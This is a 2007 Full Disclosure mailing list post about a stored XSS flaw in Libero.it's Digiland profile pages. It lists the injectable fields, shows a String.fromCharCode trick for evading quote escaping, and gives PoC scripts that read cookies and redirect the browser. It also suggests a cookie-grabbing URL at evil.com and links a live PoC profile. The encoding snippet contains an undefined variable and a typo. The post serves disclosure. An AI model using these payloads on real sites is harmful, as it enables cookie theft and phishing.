Full Disclosure mailing list archives
Another XSS vulnerability in Italian provider Libero.it
From: "Matteo G.P. Flora" <mf () matteoflora com>
Date: Wed, 28 Mar 2007 17:48:09 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 After the report of Rosario Valotta on this ML, another XSS vulnerability has been found on Libero.it, one of the most important italian ISP (www.libero.it). Nothing more than a trivial error but, since Libero.it staff used the printed media to inform that Rosario's find was just a "spot" issue, it is important to demonstrate that this kind of errors are quite more widespread and to let the Libero staff and management realize that a potential attack must be avoid by a deep check of the portal. The vulnerability once again can be found in the "Community" section of Libero portal, and the affected functionality is the profile creation and retrieval <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>. The implementation of this functionality allows the injection of malicious code in the profile, so that an attacker by visiting his/her profile can: 1) steal username (in cookie) 2) steal cookies 3) arbitrary redirection for Phishing purpose The normal URL would be something linked like this: http://digiland.libero.it/profilo.phtml?nick=Nick&top=1 where "Nick" is the name of the nick whose profile has been manipulated or crafted to add arbitrary code. This vulnerability closely resemble to those in MySpace and other communities. So it's nothing really complicated and you can skip on from here on ;) In admin pages (need to be logged by creating a fake account) on page http://digiland.libero.it/profilo_add.php?nocache=1175076655 there are two different fields named "I miei difetti:" (my defects) and "i miei pregi:" (my strong points) that accept arbitrary content. As stated by Rosario, the Libero.it web application performs a simple parsing of the posted content, so that quote and double-quote (' and ") chars are escaped by putting a \ before of them (both using ASCII and URL encoding). While I already had the Rosario's beautiful implementation of a simple evasion technique I preferred to encode the single char in an old snippet of mine. The aim of the snippet (I don't remember if I made it, stole it, stole only the main idea or where, sorry) is to transform a string into a series of char numbers to be used with a String.fromCharCode command. Due to the limitation in size, the function which create the String.fromCharCode sequence is a detached and ascii value is decreased of 100 to limit the number of digits. This is the creation snippet: <script> var toBenc = "hettp://www.lastknight.com"; var result = ""; for (var k = 0; k < carlo.length; k++) { result += ("e(" + (toBenc .charCodeAt(k) - 100) + ")+"); } document.write(result + "<br>") </script> So URL "http://www.lastknight.com" is rendered as: e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19) +e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3) +e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9); Using the two boxes we can use the following code for a POC: [BOX 1] <script> function e(A) { return String.fromCharCode(A + 100) } alert(document.cookie); </script> [BOX 2] <script> var k = e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8); k += e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9); alert(k); window.location = k; </script> The posting url can be easily modified to an http grabber such as: <http://evil.com/grab?c="+encodeURI(document.cookie);> or (much more dangerous) to a phishing site. Session Riding and derived problems have not been tested but many italian security experts are working on it. A POC url is available (until not deleted) here: <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1> Just my 2 cents and thanks to: <Rosario Valotta> for the first report, upon which this is based <SharDick> for help in JS ;) <Vokda && Zen> for consultancy and typo-killing ;) Greetings, MgpF Permanent Url: <http://www.lastknight.com/libero-xss/> - -- Matteo G.P. Flora | mf () matteoflora com | www.MatteoFlora.com pgp F3B6BC10 | blog www.LastKnight.com | M1S3c | OPSI -----BEGIN PGP SIGNATURE----- Version: 6.5.8ckt http://www.ipgpp.com/ iQA/AwUBRgp+6b0eKbDztrwQEQIPXgCdHuKidcpwAcEl8ed04OOB9vX3TXEAoJNW DislDrWXrtV+xTgqqAmbnFq0 =XWLp -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Another XSS vulnerability in Italian provider Libero.it LK (Mar 28)
- Re: Another XSS vulnerability in Italian provider Libero.it Kradorex Xeron (Mar 29)
- <Possible follow-ups>
- Another XSS vulnerability in Italian provider Libero.it Matteo G.P. Flora (Mar 28)
- Another XSS vulnerability in Italian provider Libero.it Matteo G.P. Flora (Mar 28)